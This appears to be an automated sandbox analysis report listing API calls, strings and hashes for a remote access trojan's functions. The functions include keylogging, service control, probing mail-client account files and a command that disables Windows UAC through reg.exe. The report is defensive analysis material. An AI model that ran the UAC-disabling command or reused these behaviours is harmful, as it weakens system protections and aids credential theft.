                          • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                          • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                          • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                          Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcatW.KERNEL32(?,?), ref: 10001038
                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: lstrlen$AttributesFilelstrcat
                          • String ID:
                          • API String ID: 3594823470-0
                          • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                          • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                          • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                          • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                          Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                          Download Yara Rule
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                          • String ID:
                          • API String ID: 493672254-0
                          • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                          • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                          • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                          • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                          Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                          • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                          • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                          • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                          • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                          Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                          • _free.LIBCMT ref: 10005B2D
                          • _free.LIBCMT ref: 10005B55
                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                          • _abort.LIBCMT ref: 10005B74
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: ErrorLast$_free$_abort
                          • String ID:
                          • API String ID: 3160817290-0
                          • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                          • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                          • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                          • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                          Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                          • _free.LIBCMT ref: 004482CC
                          • _free.LIBCMT ref: 004482F4
                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                          • _abort.LIBCMT ref: 00448313
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_free$_abort
                          • String ID:
                          • API String ID: 3160817290-0
                          • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                          • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                          • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                          • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                          Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                          Download Yara Rule
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Service$CloseHandle$Open$ControlManager
                          • String ID:
                          • API String ID: 221034970-0
                          • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                          • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                          • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                          • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                          Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                          Download Yara Rule
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Service$CloseHandle$Open$ControlManager
                          • String ID:
                          • API String ID: 221034970-0
                          • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                          • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                          • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                          • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                          Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                          Download Yara Rule
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Service$CloseHandle$Open$ControlManager
                          • String ID:
                          • API String ID: 221034970-0
                          • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                          • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                          • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                          • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                          Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                          • API String ID: 4036392271-1520055953
                          • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                          • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                          • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                          • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                          Function 0040B19F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                          • wsprintfW.USER32 ref: 0040B22E
                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: EventLocalTimewsprintf
                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                          • API String ID: 1497725170-248792730
                          • Opcode ID: e3693a350b1622166f97d02a0b5d86e181ebd5c9cb8161137e773e05ea357f11
                          • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                          • Opcode Fuzzy Hash: e3693a350b1622166f97d02a0b5d86e181ebd5c9cb8161137e773e05ea357f11
                          • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                          Function 00443AD3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: X8|
                          • API String ID: 0-3552716790
                          • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                          • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                          • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                          • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                          Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                          • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                          • CloseHandle.KERNEL32(00000000), ref: 0040A729
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSizeSleep
                          • String ID: XQG
                          • API String ID: 1958988193-3606453820
                          • Opcode ID: 3b1a01b47bddebb3752f31eb226f8e532d480515b9e880c3ec3420bf47c2c25d
                          • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                          • Opcode Fuzzy Hash: 3b1a01b47bddebb3752f31eb226f8e532d480515b9e880c3ec3420bf47c2c25d
                          • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                          Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ClassCreateErrorLastRegisterWindow
                          • String ID: 0$MsgWindowClass
                          • API String ID: 2877667751-2410386613
                          • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                          • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                          • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                          • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                          Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                          • CloseHandle.KERNEL32(?), ref: 004077E5
                          • CloseHandle.KERNEL32(?), ref: 004077EA
                          Strings
                          • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$CreateProcess
                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                          • API String ID: 2922976086-4183131282
                          • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                          • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                          • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                          • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                          Function 004433DA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                          • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                          • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                          • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                          • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                          Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                          • CloseHandle.KERNEL32(?), ref: 00405140
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                          • String ID: KeepAlive | Disabled
                          • API String ID: 2993684571-305739064
                          • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                          • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                          • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                          • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                          Function 0041AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                          • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                          • Sleep.KERNEL32(00002710), ref: 0041AE98
                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: PlaySound$HandleLocalModuleSleepTime
                          • String ID: Alarm triggered
                          • API String ID: 614609389-2816303416
                          • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                          • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                          • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                          • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                          Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                          • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                          • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                          Strings
                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
